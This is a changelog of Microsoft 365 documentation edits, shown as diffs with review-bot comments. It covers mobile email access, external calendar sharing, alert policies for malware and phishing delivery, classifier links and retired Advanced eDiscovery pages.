Updates from: 01/06/2021 04:07:46
Category Microsoft Docs article Related commit history on GitHub Change details
admin https://docs.microsoft.com/en-us/microsoft-365/admin/email/access-email-from-a-mobile-device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/email/access-email-from-a-mobile-device.md
@@ -21,22 +21,20 @@ description: "Learn how to access email from your mobile device."
# Options for accessing email from your mobile device
-Your organization has configured settings which control what mobile apps you can use to access your work account for email, calendar and contacts.
-
-The Outlook for Android and Outlook for iOS mobile apps are designed for your work or school email, and are the only apps to provide features like [Focused Inbox](https://support.microsoft.com/office/f445ad7f-02f4-4294-a82e-71d8964e3978), which keeps important emails front and center, and [Scheduling Assistant](https://www.microsoft.com/?ref=go), which helps you find meeting times that work with colleagues and simply finds available conference rooms.
+Your organization configures settings which control what mobile apps you can use to access your work account for email, calendar and contacts.
+
+The Outlook for Android and Outlook for iOS mobile apps are designed for your work or school email. These apps provide features like [Focused Inbox](https://support.microsoft.com/office/f445ad7f-02f4-4294-a82e-71d8964e3978), which keeps important emails front and center, and [Scheduling Assistant](https://support.microsoft.com/office/scheduling-made-easy-in-outlook-mobile-11c5bee5-d78a-4a2b-80c2-2b386ddb4470), which helps you find meeting times that work with colleagues and simply finds available conference rooms.
## End user experience
- **Outlook only**
-
+### Outlook Only
+ Your organization requires that you use the Outlook for Android or Outlook for iOS mobile apps to access company email, calendar, and contacts. Your data will start syncing once you download and install Outlook for Android or Outlook for iOS.
-
+ ![Example email to use Outlook to sync email](../../media/798d942a-4181-4dcb-8039-cd9f2edd9723.png)
-
-Check out [Optimize the Outlook mobile app for your iOS or Android phone](https://support.microsoft.com/office/de075b19-b73c-4d8a-841b-459982c7e890) for more Outlook features. And go to [Outlook for iOS and Android Help Center](https://support.microsoft.com/office/cd84214e-a5ac-4e95-9ea3-e07f78d0cde6) if you run into any issues.
-
- **Any email app**
-
-Your organization recommends that you use the Outlook for Android or iOS mobile app to access your work or school account for email, calendar, and contacts. If you don't take any action within the next few hours, your email will automatically begin syncing. If you choose to use the Outlook for Android or iOS mobile app, your data will only sync with the Outlook for Android or Outlook for iOS mobile app. If you choose to continue using the third-party app, your data will start to sync instantly.
-
+Check out [Optimize the Outlook mobile app for your iOS or Android phone](https://support.microsoft.com/office/de075b19-b73c-4d8a-841b-459982c7e890) for more Outlook features. And go to [Outlook for iOS and Android Help Center](https://support.microsoft.com/office/cd84214e-a5ac-4e95-9ea3-e07f78d0cde6) if you run into any issues.
+
+### Any email app
+
+Your organization recommends that you use the Outlook for Android or iOS mobile app to access your work or school account for email, calendar, and contacts. If you don't take any action within the next few hours, your email will automatically begin syncing. If you choose to use the Outlook for Android or iOS mobile app, your data will only sync with the Outlook for Android or Outlook for iOS mobile app. If you choose to continue using the third-party app, your data will start to sync instantly.
\ No newline at end of file
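Review bot: the new heading `### Outlook Only` uses title case, while its sibling `### Any email app` and the bold label it replaces (`**Outlook only**`) use sentence case. Make it `### Outlook only` so the two end-user options read as a matched pair. The paragraph and image added under that heading also start with a leading space that the "Any email app" paragraph does not have, and the file now ends without a trailing newline.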
admin https://docs.microsoft.com/en-us/microsoft-365/admin/manage/share-calendars-with-external-users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/manage/share-calendars-with-external-users.md
@@ -21,32 +21,28 @@ search.appverid:
- MET150 - MOE150 ms.assetid: fb00dd4e-2d5f-4e8d-8ff4-94b2cf002bdd
-description: "Learn how to let your users share their calendars with external users for meetings and appointments. "
+description: "Learn how to let your users share their calendars with external users for meetings and appointments."
--- # Share calendars with external users
-It's often necessary to schedule meetings with people outside your organization. To simplify the process of finding mutually agreeable meeting times, Microsoft 365 enables you to make calendars available to "external users," those who need to see free/busy time but don't have user accounts for your Microsoft 365 environment.
-
-Calendar sharing is a global setting, meaning that you, the admin, can enable it for all users in the tenant. Once sharing is enabled, users can use Outlook Web App to share their calendars with anyone inside or outside the organization. People inside the organization can view the shared calendar side-by-side with their own. People outside the organization will be sent a URL that they can use to view the calendar. Users decide when to share, how much to share, and when to keep their calendars private.
-
+It's sometimes necessary for your users to schedule meetings with people outside your organization. To simplify the process of finding common meeting times, Microsoft 365 enables you to make calendars available to these people. These are people who need to see free and busy times for users in your organization, but don't have user accounts for your Microsoft 365 organization.
+
+You can enable calendar sharing for all users in your organization in the Microsoft 365 admin center. Once sharing is enabled, your users can use Outlook Web App to share their calendars with anyone inside or outside the organization. People inside the organization can view the shared calendar along with their own calendar. People outside the organization will be sent a URL that they can use to view the calendar. Users in your organization decide when to share and how much to share.
+ > [!NOTE]
-> If you want to share calendars with an organization that uses Exchange Server 2013 (an on-premises solution), the Exchange administrator will need to set up an authentication relationship with the cloud. This is known as "federation" and must meet minimum software requirements. See [Sharing](https://technet.microsoft.com/library/dd638083%28v=exchg.150%29.aspx) for more information.
+> If you want to share calendars with an organization that uses Exchange Server 2013 (an on-premises solution), the Exchange administrator will need to set up an authentication relationship with the cloud. This is known as federation, and must meet minimum software requirements. See [Sharing](https://technet.microsoft.com/library/dd638083%28v=exchg.150%29.aspx) for more information.
## Enable calendar sharing using the Microsoft 365 admin center
-1. In the admin center, go to **Settings** \> **Org Settings**.
-
+1. In the admin center, go to **Settings** \> **Org Settings**.
+ 2. On the **Services** tab, select **Calendar**.
-3. On the **Calendar** page that opens, choose whether you want to let your users share their calendars with people outside of your organization who have Microsoft 365 or Exchange.
-
-4. Choose whether you want to allow anonymous users (users without logon credentials) to access calendars via an email invitation.
+3. On the **Calendar** page, choose whether you want to let users share their calendars with people outside of your organization who have Microsoft 365 or Exchange. Choose whether you want to allow anonymous users (users without credentials) to access calendars via an email invitation.
-5. Choose what type of calendar information to make available to users. You can allow all information, or limit it to time only or time, subject, and location only.
+4. Choose what type of calendar information to make available to users. You can allow all information, or limit it to time only or time, subject, and location only.
-
## Invite people to access calendars
-Once sharing is enabled for the tenant, calendar owners can extend invitations to specific users. See [Sharing your calendar in Outlook Web App](https://support.microsoft.com/office/7ecef8ae-139c-40d9-bae2-a23977ee58d5) for instructions.
-
+Once sharing is enabled, calendar owners can extend invitations to specific users. See [Sharing your calendar in Outlook Web App](https://support.microsoft.com/office/7ecef8ae-139c-40d9-bae2-a23977ee58d5) for instructions.
\ No newline at end of file
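Review bot: new step 3 folds the anonymous-access choice into the same step as sharing with people who have Microsoft 365 or Exchange; these were separate steps 3 and 4 before. Allowing users without credentials to open a calendar from an email invitation is a different exposure decision from sharing with authenticated external users, so keep it as its own numbered step, followed by the step that limits how much calendar information is shown. The rewritten overview also drops "when to keep their calendars private", so the page no longer says that users can choose not to share.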
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/alert-policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/alert-policies.md
@@ -43,7 +43,7 @@ Here's a quick overview of how alert policies work and the alerts that are trigg
2. A user performs an activity that matches the conditions of an alert policy. In the case of malware attacks, infected email messages sent to users in your organization trigger an alert.
-3. Microsoft 365 generates an alert that's displayed on the **View alerts** page in the Security & Compliance Center. Also, if email notifications are enabled for the alert policy, Microsoft sends a notification to a list of recipients. The alerts that an admin or other users can see that on the View alerts page is determined by the roles assigned to the user. For more information, see the [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts) section.
+3. Microsoft 365 generates an alert that's displayed on the **View alerts** page in the Security & Compliance Center. Also, if email notifications are enabled for the alert policy, Microsoft sends a notification to a list of recipients. The alerts that an admin or other users can see that on the View alerts page is determined by the roles assigned to the user. For more information, see [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts).
4. An admin manages alerts in the security and compliance center. Managing alerts consists of assigning an alert status to help track and manage any investigation.
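Review bot: the rewritten step 3 still carries the broken sentence "The alerts that an admin or other users can see that on the View alerts page is determined by the roles assigned to the user". Since the line is being touched anyway, fix it, for example: "The alerts that an admin or other user can see on the View alerts page are determined by the roles assigned to the user." The surrounding steps also mix "Security & Compliance Center" (step 3) with "security and compliance center" (step 4); pick one form.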
@@ -100,7 +100,7 @@ An alert policy consists of the following settings and conditions.
Microsoft provides built-in alert policies that help identify Exchange admin permissions abuse, malware activity, potential external and internal threats, and information governance risks. On the **Alert policies** page, the names of these built-in policies are in bold and the policy type is defined as **System**. These policies are turned on by default. You can turn off these policies (or back on again), set up a list of recipients to send email notifications to, and set a daily notification limit. The other settings for these policies can't be edited.
-The following table lists and describes the available default alert policies and the category each policy is assigned to. The category is used to determine which alerts a user can view on the View alerts page. For more information, see the [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts) section.
+The following table lists and describes the available default alert policies and the category each policy is assigned to. The category is used to determine which alerts a user can view on the View alerts page. For more information, see [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts).
The table also indicates the Office 365 Enterprise and Office 365 US Government plan required for each one. Some default alert policies are available if your organization has the appropriate add-on subscription in addition to an E1/F1/G1 or E3/G3 subscription.
@@ -120,6 +120,11 @@ The table also indicates the Office 365 Enterprise and Office 365 US Government
|**Malware campaign detected after delivery**|Generates an alert when an unusually large number of messages containing malware are delivered to mailboxes in your organization. If this event occurs, Microsoft removes the infected messages from Exchange Online mailboxes. This policy has a **High** severity setting.|Threat management|E5/G5 or Microsoft Defender for Office 365 P2 add-on subscription| |**Malware campaign detected and blocked**|Generates an alert when someone has attempted to send an unusually large number of email messages containing a certain type of malware to users in your organization. If this event occurs, the infected messages are blocked by Microsoft and not delivered to mailboxes. This policy has a **Low** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**Malware campaign detected in SharePoint and OneDrive**|Generates an alert when an unusually high volume of malware or viruses is detected in files located in SharePoint sites or OneDrive accounts in your organization. This policy has a **High** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription|
+|**Malware not zapped because ZAP is disabled**| Generates an alert when Microsoft detects delivery of a malware message to a mailbox because Zero-Hour Auto Purge for Phish messages is disabled. This policy has an **Informational** severity setting. |Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription|
+|**Phish delivered because a user's Junk Mail folder is disabled**|Generates an alert when Microsoft detects a userΓÇÖs Junk Mail folder is disabled, allowing delivery of a high confidence phishing message to a mailbox. This policy has an **Informational** severity setting.|Threat management|E5/G5 or Defender for Office 365 P1 or P2 add-on subscription|
+|**Phish delivered due to an ETR override**|Generates an alert when Microsoft detects an Exchange Transport Rule (ETR) that allowed delivery of a high confidence phishing message to a mailbox. This policy has an **Informational** severity setting. For more information about Exchange Transport Rules (Mail flow rules), see [Mail flow rules (transport rules) in Exchange Online](https://docs.microsoft.com/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules).|Threat management|E5/G5 or Defender for Office 365 P1 or P2 add-on subscription|
+|**Phish delivered due to an IP allow policy**|Generates an alert when Microsoft detects an IP allow policy that allowed delivery of a high confidence phishing message to a mailbox. This policy has an **Informational** severity setting. For more information about the IP allow policy (connection filtering), see [Configure the default connection filter policy - Office 365](https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-the-connection-filter-policy).|Threat management|E5/G5 or Defender for Office 365 P1 or P2 add-on subscription|
+|**Phish not zapped because ZAP is disabled**| Generates an alert when Microsoft detects delivery of a high confidence phishing message to a mailbox because Zero-Hour Auto Purge for Phish messages is disabled. This policy has an **Informational** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription|
|**Phish delivered due to tenant or user override**<sup>1</sup>|Generates an alert when Microsoft detects an admin or user override allowed the delivery of a phishing message to a mailbox. Examples of overrides include an inbox or mail flow rule that allows messages from a specific sender or domain, or an anti-spam policy that allows messages from specific senders or domains. This policy has a **High** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**Suspicious email forwarding activity**|Generates an alert when someone in your organization has auto-forwarded email to a suspicious external account. This is an early warning for behavior that may indicate the account is compromised, but not severe enough to restrict the user. This policy has a **Medium** severity setting. Although it's rare, an alert generated by this policy may be an anomaly. It's a good idea to [check whether the user account is compromised](../security/office-365-security/responding-to-a-compromised-email-account.md).|Threat management|E1/F1/G1, E3/G3, or E5/G5| |**Suspicious email sending patterns detected**|Generates an alert when someone in your organization has sent suspicious email and is at risk of being restricted from sending email. This is an early warning for behavior that may indicate that the account is compromised, but not severe enough to restrict the user. This policy has a **Medium** severity setting. Although it's rare, an alert generated by this policy may be an anomaly. However, it's a good idea to [check whether the user account is compromised](../security/office-365-security/responding-to-a-compromised-email-account.md).|Threat management|E1/F1/G1, E3/G3, or E5/G5 |
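Review bot: in the added row **Malware not zapped because ZAP is disabled**, the description says delivery happened "because Zero-Hour Auto Purge for Phish messages is disabled". This is the same wording as the **Phish not zapped because ZAP is disabled** row and looks copied from it. Please confirm which ZAP setting the malware alert keys on and name it in that row. Two smaller points: the apostrophe in "user's Junk Mail folder" in the second added row is a non-ASCII character that renders garbled, so use a straight apostrophe as the row title does; and **Phish not zapped because ZAP is disabled** is inserted ahead of **Phish delivered due to tenant or user override**, which breaks the alphabetical order of the neighbouring rows.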
@@ -130,7 +135,7 @@ The table also indicates the Office 365 Enterprise and Office 365 US Government
|**Unusual increase in email reported as phish**|Generates an alert when there's a significant increase in the number of people in your organization using the Report Message add-in in Outlook to report messages as phishing mail. This policy has a **High** severity setting. For more information about this add-in, see [Use the Report Message add-in](https://support.office.com/article/b5caa9f1-cdf3-4443-af8c-ff724ea719d2).|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**User impersonation phish delivered to inbox/folder**<sup>1,</sup><sup>2</sup>|Generates an alert when Microsoft detects that an admin or user override has allowed the delivery of a user impersonation phishing message to the inbox (or other user-accessible folder) of a mailbox. Examples of overrides include an inbox or mail flow rule that allows messages from a specific sender or domain, or an anti-spam policy that allows messages from specific senders or domains. This policy has a **Medium** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**User restricted from sending email**|Generates an alert when someone in your organization is restricted from sending outbound mail. This typically results when an account is compromised, and the user is listed on the **Restricted Users** page in the Security & Compliance Center. (To access this page, go to **Threat management > Review > Restricted Users**). This policy has a **High** severity setting. For more information about restricted users, see [Removing a user, domain, or IP address from a block list after sending spam email](https://docs.microsoft.com/office365/securitycompliance/removing-user-from-restricted-users-portal-after-spam).|Threat management|E1/F1/G1, E3/G3, or E5/G5|
-|||||
+||||
> [!NOTE] > <sup>1</sup> We've temporarily removed this default alert policy based on customer feedback. We're working to improve it, and will replace it with a new version in the near future. Until then, you can create a custom alert policy to replace this functionality by using the following settings:<br/>&nbsp; * Activity is Phish email detected at time of delivery<br/>&nbsp; * Mail is not ZAP'd<br/>&nbsp; * Mail direction is Inbound<br/>&nbsp; * Mail delivery status is Delivered<br/>&nbsp; * Detection technology is Malicious URL retention, URL detonation, Advanced phish filter, General phish filter, Domain impersonation, User impersonation, and Brand impersonation<br/><br/>&nbsp;&nbsp;&nbsp;For more information about anti-phishing in Office 365, see [Set up anti-phishing and anti-phishing policies](../security/office-365-security/set-up-anti-phishing-policies.md).<br/><br/><sup>2</sup> To recreate this alert policy, follow the guidance in the previous footnote, but choose User impersonation as the only Detection technology.
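Review bot: the closing row changes from `|||||` to `||||`, but every data row shown for this table has four cells (policy, description, category, subscription), which takes five pipes. With four pipes the row is one cell short of the table. Keep `|||||`, or drop the empty row altogether.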
@@ -139,7 +144,7 @@ The unusual activity monitored by some of the built-in policies is based on the
## Viewing alerts
-When an activity performed by users in your organization matches the settings of an alert policy, an alert is generated and displayed on the **View alerts** page in the security and compliance center. Depending on the settings of an alert policy, an email notification is also sent to a list of specified users when an alert is triggered. For each alert, the dashboard on the **View alerts** page displays the name of the corresponding alert policy, the severity and category for the alert (defined in the alert policy), and the number of times an activity has occurred that resulted in the alert being generated. This value is based on the threshold setting of the alert policy. The dashboard also shows the status for each alert. For more information about using the status property to manage alerts, see the [Managing alerts](#managing-alerts) section.
+When an activity performed by users in your organization matches the settings of an alert policy, an alert is generated and displayed on the **View alerts** page in the security and compliance center. Depending on the settings of an alert policy, an email notification is also sent to a list of specified users when an alert is triggered. For each alert, the dashboard on the **View alerts** page displays the name of the corresponding alert policy, the severity and category for the alert (defined in the alert policy), and the number of times an activity has occurred that resulted in the alert being generated. This value is based on the threshold setting of the alert policy. The dashboard also shows the status for each alert. For more information about using the status property to manage alerts, see [Managing alerts](#managing-alerts).
To view alerts, go to [https://protection.office.com](https://protection.office.com) and then select **Alerts** \> **View alerts**.
@@ -159,7 +164,7 @@ You can use the following filters to view a subset of all the alerts on the **Vi
- **Tags.** Use this filter to show alerts from one or more user tags. Tags are reflected based on tagged mailboxes or users that appear in the alerts. See [User tags in Office 356 ATP](..\security\office-365-security\user-tags.md) to learn more. -- **Source.** Use this filter to show alerts triggered by alert policies in the security and compliance center or alerts triggered by Office 365 Cloud App Security policies, or both. For more information about Office 365 Cloud App Security alerts, see the [Viewing Cloud App Security alerts](#viewing-cloud-app-security-alerts) section.
+- **Source.** Use this filter to show alerts triggered by alert policies in the security and compliance center or alerts triggered by Office 365 Cloud App Security policies, or both. For more information about Office 365 Cloud App Security alerts, see [Viewing Cloud App Security alerts](#viewing-cloud-app-security-alerts).
> [!IMPORTANT] > Filtering and sorting by user tags is currently in public preview.
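Review bot: the **Tags** bullet directly above the changed **Source** bullet links to "User tags in Office 356 ATP" through a backslash path (`..\security\office-365-security\user-tags.md`). While editing this list, correct "356" to "365" and switch the path to forward slashes, matching the other relative links on this page (`../security/office-365-security/...`).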
@@ -206,7 +211,7 @@ This design (based on RBAC permissions) lets you determine which alerts can be
The following table lists the roles that are required to view alerts from the six different alert categories. The first column in the tables lists all roles in the Security & Compliance Center. A check mark indicates that a user who is assigned that role can view alerts from the corresponding alert category listed in the top row.
-To see which category a default alert policy is assigned to, see the table in the [Default alert policies](#default-alert-policies) section.
+To see which category a default alert policy is assigned to, see the table in [Default alert policies](#default-alert-policies).
|Role|Information governance|Data loss prevention|Mail flow|Permissions|Threat management|Others| |:---------|:---------:|:---------:|:---------:|:---------:|:---------:|:---------:|
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/analyze-case-data-with-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/analyze-case-data-with-advanced-ediscovery.md deleted file mode 100644
@@ -1,54 +0,0 @@
-title: "Analyze case data with Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MET150-- MOE150
-ms.assetid: dce7a700-3b6e-435f-88ba-e4b82c0f2b26
-description: "Get an overview of the Analyze process, which allows you to set parameters, run options, and view results, in Microsoft 365 Advanced eDiscovery. "
-ms.custom: seo-marvel-apr2020
--
-# Analyze case data with Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The **Prepare** \> **Analyze** process in Advanced eDiscovery applies the following functionality to the included files:
-
-- Identifies and organizes the loaded files into groups of unique files, duplicates, and near-duplicates.
-
-- Identifies and organizes emails into hierarchically structured groups of email threads, based on the progressive inclusiveness of the emails.
-
-- Enables the use of Themes in Advanced eDiscovery processing and file batching.
-
- Analyze allows you to set parameters, run options, and view the results, as follows:
-
-- **Analyze setup**: Allows settings to be specified before running Analyze on the files.
-
-- **Analyze results**: Displays metrics of the analysis.
-
-Before running Analyze, define the criteria for selecting and processing files, including which loaded files will be analyzed and the type of analysis to which each type of file will be submitted.
-
-## Additional resources for Advanced eDiscovery (classic) analysis
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[Viewing Analyze tasks](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/apply-retention-labels-automatically https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/apply-retention-labels-automatically.md
@@ -242,10 +242,10 @@ When you choose the option for a trainable classifier, you can select one of the
To automatically apply a label by using this option, SharePoint sites and mailboxes must have at least 10 MB of data.
-For more information about trainable classifiers, see [Learn about trainable classifiers (preview)](classifier-learn-about.md).
+For more information about trainable classifiers, see [Learn about trainable classifiers](classifier-learn-about.md).
> [!TIP]
-> If you use trainable classifiers for Exchange, see the recently released [How to retrain a classifier in content explorer (preview)](classifier-how-to-retrain-content-explorer.md).
+> If you use trainable classifiers for Exchange, see [How to retrain a classifier in content explorer](classifier-how-to-retrain-content-explorer.md).
To consider when using trainable classifiers to auto-apply retention labels:
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/apply-sensitivity-label-automatically https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/apply-sensitivity-label-automatically.md
@@ -142,7 +142,7 @@ When you select the **Trainable classifiers** option, select one or more of the
> [!CAUTION] > We are deprecating the **Offensive Language** built-in classifier because it has been producing a high number of false positives. Don't use this built-in classifier and if you are currently using it, you should move your business processes off it. We recommend using the **Targeted Harassment**, **Profanity**, and **Threat** built-in classifiers instead.
-For more information about these classifiers, see [Learn about trainable classifiers (preview)](classifier-learn-about.md).
+For more information about these classifiers, see [Learn about trainable classifiers](classifier-learn-about.md).
During the preview period for this option, the following apps support trainable classifiers for sensitivity labels:
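Review bot: the link text drops "(preview)" from "Learn about trainable classifiers", but the very next line still opens with "During the preview period for this option, the following apps support trainable classifiers for sensitivity labels". Either that sentence should be updated in the same change, or, if trainable classifiers for sensitivity labels are still in preview while the classifiers themselves are not, say so explicitly so readers do not take the feature as generally available here.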
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/assessment-in-relevance-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/assessment-in-relevance-in-advanced-ediscovery.md
@@ -16,6 +16,7 @@ search.appverid:
- MET150 ms.assetid: 1d33d4fb-91ed-41c0-b72e-5a26eca3a2a7 description: "Get an overview of the Assessment stage and its role in determining the richness of issues during Relevance training in Microsoft 365 Advanced eDiscovery."
+ROBOTS: NOINDEX, NOFOLLOW
ms.custom: seo-marvel-apr2020 ---
@@ -47,19 +48,4 @@ Each issue has its own richness, current margin of error, and as a result, estim
You can accept the Relevance recommendations or adjust the current margin of error according to your needs. The default current margin of error is determined for recall at equal or above 75%. > [!NOTE]
-> The Assessment stage can be bypassed, in the **Relevance \> Track** tab in the expanded view for an issue, by clearing the **Assessment** check box per issue and then for "all issues". However, as a result, there will be no statistics for this issue. > Clearing the **Assessment** check box can only be done before assessment is performed. Where multiple issues exist in a case, assessment is bypassed only if the check box is cleared for each issue
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
+> The Assessment stage can be bypassed, in the **Relevance \> Track** tab in the expanded view for an issue, by clearing the **Assessment** check box per issue and then for "all issues". However, as a result, there will be no statistics for this issue. > Clearing the **Assessment** check box can only be done before assessment is performed. Where multiple issues exist in a case, assessment is bypassed only if the check box is cleared for each issue.
\ No newline at end of file
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/assign-ediscovery-permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/assign-ediscovery-permissions.md
@@ -140,10 +140,7 @@ This role lets users view a list of items that were returned from a Content Sear
### Review
-This role lets users access case data in [Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md) (also know as *Advanced eDiscovery v1*). The primary purpose of this role is to give users access to Advanced eDiscovery (classic). Users who are assigned this role can see and open the list of cases on the **eDiscovery** page in the Security & Compliance Center that they're members of. After the user accesses a case in the Security & Compliance Center, they can select **Switch to Advanced eDiscovery** to access and analyze the case data in Advanced eDiscovery (classic). This role doesn't allow the user to preview the results of a content search that's associated with the case or do other content search or case management tasks.
-
-> [!NOTE]
-> At this time, users who are assigned the Review role (or is a member of the Reviewer role group) can't access data in [Advanced eDiscovery in Microsoft 365](overview-ediscovery-20.md) (also known as *Advanced eDiscovery v2.0*). To add members to a case in Advanced eDiscovery v2.0 so that they can review case data, a user must be a member of the eDiscovery Manager role group.
+This role lets users access review sets in [Advanced eDiscovery](overview-ediscovery-20.md). Users who are assigned this role can see and open the list of cases on the **eDiscovery > Advanced** page in the Microsoft 365 compliance center that they're members of. After the user accesses an Advanced eDiscovery case, they can select **Review sets** to access case data. This role doesn't allow the user to preview the results of a collection search that's associated with the case or do other search or case management tasks. Users with this role can only access the data in a review set.
### RMS Decrypt
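Review bot: the new Review paragraph reverses the removed note, which said members of the Reviewer role group could not access Advanced eDiscovery v2.0 data and that reviewing case data required eDiscovery Manager membership. State explicitly whether case membership plus the Review role is now sufficient to open review sets, so admins who followed the old guidance know whether eDiscovery Manager is still needed for reviewers. Also, `**eDiscovery > Advanced**` uses a bare `>` where other pages in this update escape it (`**Relevance \> Track**`); use `\>` for consistency.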
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/classifier-learn-about https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/classifier-learn-about.md
@@ -20,7 +20,7 @@ search.appverid:
description: "A Microsoft 365 trainable classifier is a tool you can train to recognize various types of content by giving it positive and negative samples to look at. Once the classifier is trained, you confirm that its results are accurate. Then you use it to search through your organization's content and classify it to apply retention or sensitivity labels or include it in data loss prevention (DLP) or retention policies." ---
-# Learn about classifiers
+# Learn about trainable classifiers
Classifying and labeling content so it can be protected and handled properly is the starting place for the information protection discipline. Microsoft 365 has three ways to classify content.
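Review bot: only the H1 changes in this hunk, and the front-matter `title:` is outside it. Confirm `title:` was renamed to match "Learn about trainable classifiers" so the page title and heading do not diverge; the first body line still introduces all three ways to classify content, which is fine as long as the title and heading agree.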
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/decision-based-on-the-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/decision-based-on-the-results-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MET150 ms.assetid: aed65bcd-0a4f-43e9-b5e5-b98cc376bdf8 description: "Learn how the Decide tab in Advanced eDiscovery provides data that can help you determine the correct size of the review set of case files."
+ROBOTS: NOINDEX, NOFOLLOW
ms.custom: seo-marvel-apr2020 ---
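Review bot: `ROBOTS: NOINDEX, NOFOLLOW` is added to the metadata, but the `description:` above it still presents the Decide tab as current Advanced eDiscovery guidance with no "(classic)" marker. If the page is being hidden from search because it covers the classic tool, add a note at the top pointing readers to the replacement; NOINDEX alone does not tell someone who lands on the page through an existing link that it is legacy content.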
@@ -49,17 +50,3 @@ This tab includes the following components:
The expanded Details pane displays additional details. Files in collection figures do not include empty or nebulous files. Family files figures represent files that are not loaded in Relevance, yet still counted as part of the family.
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Performing Relevance training](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/define-case-and-tenant-settings-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/define-case-and-tenant-settings-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,91 +0,0 @@
-title: "Define case and tenant settings in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 383809de-7f5e-4a1d-9098-c525f67b7a9a
-description: "Learn about the labels, cross module, and tenant settings that you can define at the case level in Advanced eDiscovery."
-
-# Define case and tenant settings in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The Advanced eDiscovery case and tenant settings are described in this topic.
-
-## Case settings
-
-This sections describes the settings that can be defined at the case level.
-
-> [!NOTE]
-> If no case is currently selected in Advanced eDiscovery, the **Case settings** tab is inactive.
-
-### Cross module
-
-The following Cross module settings are case options that apply to Advanced eDiscovery modules.
-
-- Default page after login: Sets the default page to be displayed upon starting Advanced eDiscovery.
-
-- File display name: File identifier that will be displayed throughout Advanced eDiscovery to identify the file, as an alternative to the Advanced eDiscovery display name of file title/path or email subject.
-
-1. Open **Settings and utilities** by clicking the **Cogwheel** icon. Open **Settings and utilities \> Case settings** tab \> **Cross module**.
-
-2. Select from the **Default page after login** options:
-
- - **Last page of previous login**
-
- - **Cases page**
-
-3. Click **Save**.
-
-## Tenant settings
-
